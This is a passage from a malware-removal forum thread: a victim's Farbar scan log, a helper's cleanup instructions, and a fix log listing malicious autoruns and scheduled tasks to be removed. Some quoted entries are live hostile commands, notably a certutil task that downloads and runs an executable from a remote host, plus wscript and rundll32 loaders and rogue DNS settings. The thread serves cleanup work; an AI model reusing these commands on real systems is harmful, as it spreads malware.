    FirewallRules: [UDP Query User{EBF14250-E822-4A60-9FB2-6FEC440306EC}E:\games\rads\projects\league_client\releases\0.0.0.194\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.194\deploy\leagueclient.exe No File
    FirewallRules: [TCP Query User{8F5842AD-90DF-4EC2-8630-980B9479B713}E:\games\rads\projects\league_client\releases\0.0.0.195\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.195\deploy\leagueclient.exe No File
    FirewallRules: [UDP Query User{AB0D1027-2C3A-4C16-9427-5FF50C75DB4D}E:\games\rads\projects\league_client\releases\0.0.0.195\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.195\deploy\leagueclient.exe No File
    FirewallRules: [TCP Query User{4027D36A-0AEF-4C6A-A8AC-47AD5A5505C6}E:\games\rads\projects\league_client\releases\0.0.0.196\deploy\leagueclient.exe] => (Block) E:\games\rads\projects\league_client\releases\0.0.0.196\deploy\leagueclient.exe No File
    FirewallRules: [UDP Query User{E724A492-367D-483A-8179-CDCE04756E60}E:\games\rads\projects\league_client\releases\0.0.0.196\deploy\leagueclient.exe] => (Block) E:\games\rads\projects\league_client\releases\0.0.0.196\deploy\leagueclient.exe No File
    FirewallRules: [TCP Query User{6FCCDFC0-93C6-4717-AE45-942A578C3F56}E:\games\rads\projects\league_client\releases\0.0.0.197\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.197\deploy\leagueclient.exe No File
    FirewallRules: [UDP Query User{73648983-6CAD-48A1-8BA7-E95DD52CC140}E:\games\rads\projects\league_client\releases\0.0.0.197\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.197\deploy\leagueclient.exe No File
    FirewallRules: [TCP Query User{68C4B8C4-EAA3-4FCF-9BE2-27BBB3CD2299}E:\games\rads\projects\league_client\releases\0.0.0.198\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.198\deploy\leagueclient.exe No File
    FirewallRules: [UDP Query User{72A3754F-5ECD-4574-A027-4BFF9155AF2D}E:\games\rads\projects\league_client\releases\0.0.0.198\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.198\deploy\leagueclient.exe No File
    FirewallRules: [TCP Query User{95D70916-604A-4533-A225-E2D313441626}E:\games\rads\projects\league_client\releases\0.0.0.199\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.199\deploy\leagueclient.exe No File
    FirewallRules: [UDP Query User{6BADDD19-3EEB-451F-9943-587F3AA461A1}E:\games\rads\projects\league_client\releases\0.0.0.199\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.199\deploy\leagueclient.exe No File
    FirewallRules: [TCP Query User{AA6EA860-CD3D-4603-BE86-0189B88D5FC5}E:\games\rads\projects\league_client\releases\0.0.0.200\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.200\deploy\leagueclient.exe No File
    FirewallRules: [UDP Query User{70C01B83-34DD-42EC-994D-EBCE33276AF0}E:\games\rads\projects\league_client\releases\0.0.0.200\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.200\deploy\leagueclient.exe No File
    FirewallRules: [TCP Query User{BE469871-9FE9-45BB-9820-8D1D6B97098B}C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe
    FirewallRules: [UDP Query User{F0909DE9-6E40-4290-A9B6-7592A48243A2}C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe
    FirewallRules: [TCP Query User{1C43905B-EBF2-4EB2-98BA-A1588271A4A7}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe (Logitech Inc -> Logitech Inc.)
    FirewallRules: [UDP Query User{5CD32F36-BC56-4539-81BF-983D98B595F7}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe (Logitech Inc -> Logitech Inc.)
    FirewallRules: [{1E48863E-82C4-4CFC-8C65-E84EDD7AEEE5}] => (Allow) C:\Program Files (x86)\MacroRecorder\MacroRecorder.exe (Bartels Media GmbH -> )
    FirewallRules: [{04F54D40-42CD-43A9-A4A5-99EE3FBB227E}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
    FirewallRules: [{E644DA54-1CE8-49F2-8E15-47021D05FFA3}] => (Allow) C:\Windows\rss\csrss.exe No File
    FirewallRules: [{8432CF9C-0A84-45F8-B112-BE8BDCF95AC1}] => (Allow) C:\Users\ADMIN\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe No File
    FirewallRules: [{0AF48B2D-2187-4B6D-9D7F-F17B5DDB7A98}] => (Allow) C:\Users\ADMIN\AppData\Local\Temp\csrss\lsa64.exe (Node.js) [File not signed]
    FirewallRules: [{07F640E7-E12C-48C4-957A-D30FFDB72950}] => (Allow) C:\Users\ADMIN\AppData\Local\Temp\csrss\lsa64.exe (Node.js) [File not signed]
    FirewallRules: [{46CF3FC6-A7A9-453F-B55C-9168DE57DB8B}] => (Allow) C:\Users\ADMIN\AppData\Local\Temp\csrss\lsa64.exe (Node.js) [File not signed]
    FirewallRules: [{87A810BC-EC8F-400A-BA25-518796D3A60C}] => (Allow) C:\Users\ADMIN\AppData\Local\Temp\csrss\lsa64.exe (Node.js) [File not signed]

    ==================== Restore Points =========================


    ==================== Faulty Device Manager Devices =============


    ==================== Event log errors: =========================

    Application errors:
    ==================
    Error: (07/10/2019 04:25:07 PM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: )
    Description: Event-ID 0

    Error: (07/09/2019 08:58:43 PM) (Source: Application Hang) (EventID: 1002) (User: )
    Description: The program chrome.exe version 75.0.3770.100 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

    Process ID: 115c

    Start Time: 01d5366869cb28be

    Termination Time: 60000

    Application Path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

    Report Id: e754105d-a25d-11e9-93ce-eca86b72ed8f

    Error: (07/09/2019 08:38:26 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
    Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.
    .

    Error: (07/09/2019 04:12:26 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
    Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.
    .

    Error: (07/09/2019 04:12:26 PM) (Source: MsiInstaller) (EventID: 1024) (User: NT AUTHORITY)
    Description: Product: Adobe Acrobat Reader DC - Update 'Adobe Acrobat Reader DC
    (19.010.20098)' could not be installed. Error code 1603. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127

    Error: (07/09/2019 04:12:20 PM) (Source: MsiInstaller) (EventID: 11722) (User: NT AUTHORITY)
    Description: Product: Adobe Acrobat Reader DC -- Error 1722.There is a problem with this Windows Installer package. A program run as part of the setup did not finish as expected. Contact your support personnel or package vendor. Action InstallWebResources, location: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe, command: 19.010.20098 17.012.20098.1

    Error: (07/09/2019 04:11:19 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
    Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.
    .

    Error: (07/09/2019 04:10:40 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
    Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.
    .


    System errors:
    =============
    Error: (07/10/2019 04:59:46 PM) (Source: volsnap) (EventID: 36) (User: )
    Description: The shadow copies of volume C: were aborted because the shadow copy storage could not grow due to a user imposed limit.

    Error: (07/10/2019 04:16:23 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
    Description: The HWDeviceService64.exe service terminated unexpectedly. It has done this 1 time(s).

    Error: (07/10/2019 04:15:00 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The Logitech CPU Core Tempurature service failed to start due to the following error:
    Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Error: (07/09/2019 08:59:28 PM) (Source: Service Control Manager) (EventID: 7043) (User: )
    Description: The Malwarebytes Service service did not shut down properly after receiving a preshutdown control.

    Error: (07/09/2019 08:39:40 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
    Description: The HWDeviceService64.exe service terminated unexpectedly. It has done this 1 time(s).

    Error: (07/09/2019 08:37:49 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The Logitech CPU Core Tempurature service failed to start due to the following error:
    Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Error: (07/09/2019 03:59:25 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
    Description: The HWDeviceService64.exe service terminated unexpectedly. It has done this 1 time(s).

    Error: (07/09/2019 03:58:12 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The Logitech CPU Core Tempurature service failed to start due to the following error:
    Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


    Windows Defender:
    ===================================
    Date: 2018-07-09 16:31:35.852
    Description:
    Windows Defender scan has been stopped before completion.
    Scan ID:{0E735C6C-5437-4DB1-84A0-257CEA6AD9FF}
    Scan Type:AntiSpyware
    Scan Parameters:Quick Scan

    Date: 2018-02-28 20:59:13.565
    Description:
    Windows Defender scan has been stopped before completion.
    Scan ID:{21FC7961-5BE5-47ED-B9B2-A434EAC5D866}
    Scan Type:AntiSpyware
    Scan Parameters:Quick Scan

    CodeIntegrity:
    ===================================

    Date: 2019-07-10 16:15:00.974
    Description:
    Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\LgCoreTemp.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2019-07-10 16:15:00.974
    Description:
    Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\LgCoreTemp.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2019-07-09 20:37:49.236
    Description:
    Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\LgCoreTemp.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2019-07-09 20:37:49.236
    Description:
    Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\LgCoreTemp.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2019-07-09 15:58:12.459
    Description:
    Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\LgCoreTemp.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2019-07-09 15:58:12.443
    Description:
    Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\LgCoreTemp.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2019-07-09 15:04:51.494
    Description:
    Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\LgCoreTemp.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2019-07-09 15:04:51.494
    Description:
    Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\LgCoreTemp.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    ==================== Memory info ===========================

    BIOS: Intel Corp. HOH6110H.86A.0010.2012.0424.1632 04/24/2012
    Motherboard: Intel Corporation DH61HO
    Processor: Intel(R) Core(TM) i3-2100 CPU @ 3.10GHz
    Percentage of memory in use: 95%
    Total physical RAM: 4066.59 MB
    Available physical RAM: 199.26 MB
    Total Virtual: 8131.34 MB
    Available Virtual: 3137.31 MB

    ==================== Drives ================================

    Drive c: () (Fixed) (Total:68.26 GB) (Free:1.22 GB) NTFS
    Drive d: (New Volume) (Fixed) (Total:97.66 GB) (Free:16.38 GB) NTFS
    Drive e: (New Volume) (Fixed) (Total:202.09 GB) (Free:69.39 GB) NTFS
    Drive f: (New Volume) (Fixed) (Total:97.66 GB) (Free:41.02 GB) NTFS

    \\?\Volume{37239b48-8526-11e5-b222-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: 24899F4E)
    Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
    Partition 2: (Not Active) - (Size=68.3 GB) - (Type=07 NTFS)
    Partition 3: (Not Active) - (Size=97.7 GB) - (Type=07 NTFS)
    Partition 4: (Not Active) - (Size=299.7 GB) - (Type=0F Extended)

    ==================== End of Addition.txt ============================
     
  6. iMacg3

    iMacg3 Malware Specialist

    Joined:
    Nov 3, 2018
    Messages:
    561
    Hi nekoshoyo,

    Do you recognize these registry entries?

    ---------------------------------------------------
    Going over your logs I noticed that you have uTorrent installed.
    • Avoid gaming sites, pirated software, cracking tools, keygens, and peer-to-peer (P2P) file sharing programs.
    • They are a security risk which can make your computer susceptible to a wide variety of malware infections, remote attacks, exposure of personal information, and identity theft. Many malicious worms and Trojans spread across P2P file sharing networks, gaming and underground sites.
    • Users visiting such pages may see innocuous-looking banner ads containing code which can trigger pop-up ads and malicious Flash ads that install viruses, Trojans and spyware. Ads are a target for hackers because they offer a stealthy way to distribute malware to a wide range of Internet users.
    • The best way to reduce the risk of infection is to avoid these types of web sites and not use any P2P applications.
    It is pretty much certain that if you continue to use P2P programs, you will get infected again.
    I would recommend that you uninstall uTorrent, however that choice is up to you. If you choose to remove these programs, you can do so via Start > Control Panel > Add/Remove Programs.
    If you wish to keep it, please do not use it until your computer is cleaned.

    ---------------------------------------------------

    Many files on your computer have been encrypted by ransomware. You can check if the ransomware is decryptable here: https://id-ransomware.malwarehunterteam.com/

    ---------------------------------------------------
    Uninstall a Program
    • Press the Windows Key + R.
    • Type appwiz.cpl in the Run box and click OK.
    • The Add/Remove Programs list will open. Locate the following programs on the list:
      Code:
      BingProvidedSearch
      Chromium
      MyStart Toolbar
      Online Application
      Web Search (Yahoo! Provided)
      YoutubeAdBlock
      
    • Select each program and click Uninstall.
    • Restart the computer if prompted.

    ---------------------------------------------------
    Uninstall a Chrome Extension
    • Open Google Chrome. Type chrome://extensions in the address bar and press Enter.
    • Click the trash can icon next to the following extension(s):
      Code:
      Adblocker for Youtube™
      Google Slides Offline
      
    • A confirmation dialog will appear. Click Remove.

    ---------------------------------------------------
    Farbar Recovery Scan Tool - Fix

    NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

    Download the attached file (fixlist.txt) and save it to the same location FRST / FRST64 is saved.
    • Start FRST / FRST64 with Administrator privileges.
    • Press the Fix button.
    • When finished, a log file (Fixlog.txt) will pop up/saved in the same location the tool was run from.
    Please copy and paste its contents in your next reply.

    ---------------------------------------------------

    In your next reply, please include:
    • Fixlog.txt
    • Let me know how the computer is doing.
     

    Attached Files:

  7. nekoshoyo

    nekoshoyo Thread Starter

    Joined:
    Jul 9, 2019
    Messages:
    12
    Hey!!
    heres the fixlog:

    Fix result of Farbar Recovery Scan Tool (x64) Version: 3-07-2019
    Ran by ADMIN (10-07-2019 21:20:19) Run:1
    Running from C:\Users\ADMIN\Desktop
    Loaded Profiles: ADMIN (Available Profiles: ADMIN & children)
    Boot Mode: Normal
    ==============================================

    fixlist content:
    *****************
    start
    CreateRestorePoint:
    EmptyTemp:
    CloseProcesses:
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [Chromium] => c:\users\admin\appdata\local\chromium\application\chrome.exe [828416 2017-01-21] (The Chromium Authors) [File not signed]
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [SummerDew] => "C:\Windows\rss\csrss.exe" <==== ATTENTION
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [nSAAPfUJ4L.exe] => C:\Program Files\NVIDIA Corporation\MAK7CBDCE4NDDPY\nSAAPfUJ4L.exe
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [3158557] => "C:\Users\ADMIN\AppData\Local\Temp\is-GMNSA.tmp\ReadyFor.exe" /VERYSILENT <==== ATTENTION
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [4166405] => "C:\Users\ADMIN\AppData\Roaming\eppsrq3otww\hykdgbc2yne.exe" /VERYSILENT
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [ZXMHTBNP7AK3TRL] => "C:\Program Files\S2SM7ZWF99\S2SM7ZWF9.exe"
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [SysHelper] => "C:\Users\ADMIN\AppData\Local\dc987dec-8cfa-49ee-8d5d-aa82c048178f\421F.tmp.exe" --AutoStart
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [7073823] => "C:\Users\ADMIN\AppData\Roaming\st1oaktw2ol\oohpkgd4ygp.exe" /VERYSILENT
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [01GFF9BFRDRUU24] => "C:\Program Files\9RIR0W407U\MGP68VA16.exe"
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [3285487] => "C:\Users\ADMIN\AppData\Roaming\nhhb4gpoag4\cntu5xc4avr.exe" /VERYSILENT
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [OX2EPEHB3K6HVZM] => "C:\Program Files\1B0ZGH03DT\1B0ZGH03D.exe"
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [ISYBWUOOMWPDFOI] => "C:\Program Files\A5H2CDJ5DL\A5H2CDJ5D.exe"
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [8384140] => "C:\Users\ADMIN\AppData\Roaming\yrgtajo5ceo\yumfmyl5hbk.exe" /VERYSILENT
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [CloudNet] => "C:\Users\ADMIN\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" <==== ATTENTION
    Startup: C:\Users\ADMIN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cuebedbh.lnk [2019-07-09]
    ShortcutAndArgument: cuebedbh.lnk -> C:\Windows\System32\cmd.exe => /c start "" "C:\Users\ADMIN\AppData\Roaming\Microsoft\Windows\cuebedbh\atsfwaeb.exe"
    GroupPolicy: Restriction - Chrome <==== ATTENTION
    GroupPolicy\User: Restriction ? <==== ATTENTION
    GroupPolicyUsers\S-1-5-21-3161437104-263828448-1275724104-1003\User: Restriction <==== ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
    Task: {001B6186-B9F4-4CCC-8B0C-5A0B2C8BE885} - System32\Tasks\mrAArNosEtAJT2 => C:\Windows\system32\wscript.exe "C:\ProgramData\JrsbweBqGiQFiyVB\ifuOxrb.wsf"
    Task: {0E237A46-D40A-4229-92DB-821169F5C7D9} - System32\Tasks\Online Application V2G3 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
    Task: {11EE3D86-DD42-4287-AB72-91B6550F8885} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
    Task: {13758B1C-CCCE-40FB-90DC-73EA63748EA5} - System32\Tasks\{C287A332-65DB-4AC3-A344-FE668FB44526} => C:\Windows\system32\pcalua.exe -a C:\Users\ADMIN\Desktop\LeagueofLegends_NA_Installer_2016_05_13.exe -d C:\Windows\SysWOW64 -c /groupsextract:100; /out:"C:\Users\ADMIN\AppData\Roaming\Riot Games\League of Legends\prerequisites" /callbackid:5836
    Task: {35285663-7DD7-4E11-B167-1D353FF1E149} - System32\Tasks\Online Application V2G6 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
    Task: {3A251981-B8E1-4DA9-AA55-A0B4BADA6873} - System32\Tasks\{B7E4FFCD-3871-411A-A449-6E0BC062B522} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Common Files\ZerStatlex\uninstall.exe" -c shuz -f "C:\Program Files (x86)\Common Files\ZerStatlex\uninstall.dat" -a uninstallme 258B13B8-A31B-451A-AAAC-54F4EDF196A6 DeviceId=c5ba6c44-869d-0d4f-b5e8-7ac9b48167df BarcodeId=51198003 ChannelId=003 DistributerName=APSFWakeNet
    Task: {50A23EB5-B5AB-415B-91F9-EB82F18D26F2} - System32\Tasks\JSpPUlYEOjGQEpF2 => rundll32 "C:\Program Files (x86)\rZdaClXBU\dBJExn.dll",#1
    Task: {5554764B-4F14-40B3-988C-E8F6186CF607} - System32\Tasks\{70FDB57E-0921-404D-8CC7-ADDDC8F32EF0} => C:\Windows\system32\pcalua.exe -a "C:\Users\ADMIN\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall
    Task: {5C42DC6E-5254-4CFD-B2E7-FF9B7131A1FE} - System32\Tasks\{633E5C42-23C4-ABE8-66E1-2266DBE038D4} => C:\Users\ADMIN\AppData\Roaming\633e5c4223c4abe866e12266dbe038d4\Fahamutas.exe [622080 2013-04-15] () [File not signed]
    Task: {5E7F7887-993A-417B-92FC-82E97B925178} - System32\Tasks\{CE00E3F7-606E-4CC5-98BE-BCBCB27B9EDC} => C:\Windows\system32\pcalua.exe -a C:\Users\ADMIN\AppData\Local\Roblox\Versions\version-418137ce542940cc\RobloxPlayerLauncher.exe -c -uninstall
    Task: {60BB3925-74CF-4F9F-A3D7-3290133AFE4E} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe <==== ATTENTION
    Task: {68AB5BC1-8480-41B1-A5D7-4D30C4B47665} - System32\Tasks\Opera scheduled Autoupdate 711520318 => C:\Users\ADMIN\AppData\Roaming\Microsoft\Windows\cuebedbh\atsfwaeb.exe
    Task: {87335B70-CF14-4C5E-864F-21555C94C5FE} - System32\Tasks\lsa64 => C:\Users\ADMIN\AppData\Local\Temp\csrss\lsa64install_in.exe <==== ATTENTION
    Task: {8C64D776-FF35-4E90-97BA-6D5B1553A472} - System32\Tasks\AWWcazHJnUfLPA => rundll32 "C:\Program Files (x86)\WOFbcaOaHmAU2\ddZBKJvEZxUnO.dll",#1
    Task: {A6E3971E-20D5-4BF5-A39D-17F461A85671} - System32\Tasks\{E41E9167-5C86-4994-8330-CCBE7DF1D074} => C:\Windows\system32\pcalua.exe -a C:\Users\ADMIN\AppData\Local\Roblox\Versions\version-3131b9dde23e4df9\RobloxPlayerLauncher.exe -c -uninstall
    Task: {B11C4F0E-95C9-47A6-ACC8-60C53F6720C3} - System32\Tasks\Online Application V2G2 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
    Task: {B377FEF3-420E-4825-A91F-00E92909C6EF} - System32\Tasks\{67B56D17-7F1F-A4E3-5640-5A99ED1D0072} => C:\Users\ADMIN\AppData\Roaming\Mefifi\Pumak.exe [1572454 2013-04-11] () [File not signed]
    Task: {B5DB98CD-7C51-4E3E-BB89-905B08A039F2} - System32\Tasks\Online Application V2G4 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
    Task: {B7648C78-359C-47AD-B703-FE0ABDEB20D8} - System32\Tasks\Yahoo! Powered rasin => C:\Windows\system32\wscript.exe "C:\ProgramData\{C7A902CA-4DEB-880C-CB2D-164E516F9D80}\daca" "68747470733a2f2f643277763764656e63316a78397a2e636c6f756466726f6e742e6e6574" "//B" "//E:jscript" "--IsErIk"
    Task: {C63C6C6E-54CE-4FFA-8039-DD354299B883} - System32\Tasks\Time Trigger Task => C:\Users\ADMIN\AppData\Local\dc987dec-8cfa-49ee-8d5d-aa82c048178f\421F.tmp.exe
    Task: {C64B27F0-57F2-4DCB-9AB5-045382600C92} - System32\Tasks\Online Application V2G5 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
    Task: {D99E7C60-2B55-4378-BD20-80EF4946069F} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe <==== ATTENTION
    Task: {E3BCCF2F-7E87-41AB-91CB-DE1669B8CA94} - System32\Tasks\txgYfgWClJeJBSoaCDR2 => rundll32 "C:\Program Files (x86)\BbdjrrKUeUXuC\IcaItHe.dll",#1
    Task: {EEC1D397-3475-4488-8723-AAC01A6F4884} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://foxmusic.xyz/app/app.exe C:\Users\ADMIN\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\ADMIN\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
    Task: {F9AEF3CB-5875-43BC-AB23-BE5DD06B7D6B} - System32\Tasks\raSRPAMuIMRBbwMvC2 => rundll32 "C:\Program Files (x86)\woOqILJDRwqbnTOZbgR\zZLkSOi.dll",#1
    Task: C:\Windows\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
    Task: C:\Windows\Tasks\Online Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
    Task: C:\Windows\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
    Task: C:\Windows\Tasks\Online Application V2G4.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
    Task: C:\Windows\Tasks\Online Application V2G5.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
    Task: C:\Windows\Tasks\Online Application V2G6.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
    Task: C:\Windows\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe <==== ATTENTION
    Task: C:\Windows\Tasks\Yahoo! Powered rasin.job => Wscript exe
    Task: C:\Windows\Tasks\{633E5C42-23C4-ABE8-66E1-2266DBE038D4}.job => C:\Users\ADMIN\AppData\Roaming\633E5C~1\FAHAMU~1.EXE <==== ATTENTION
    Task: C:\Windows\Tasks\{67B56D17-7F1F-A4E3-5640-5A99ED1D0072}.job => C:\Users\ADMIN\AppData\Roaming\Mefifi\Pumak.exe
    Tcpip\..\Interfaces\{644D5D4C-C575-4567-B554-70E1BFCA99F2}: [NameServer] 82.163.143.146,82.163.142.148
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHCxomeujIo3zShD1-ctwyql0weKHh5feEcga2qczG8ei0cxT5EOl2TGGgb5drtf4DQEi4gHxvy9W14iNyhvwM8cNgCv0nNcgJUKiAGbbU139vtitIVxADHdMlFE1CBaLJ4mQ9SQGF57Wob-cABo6mYfOrXjmkNaKrCgsrJI5VLU&q={searchTerms}
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxps://in.yahoo.com/?fr=yset_ie_syc_oracle&type=orcl_hpset
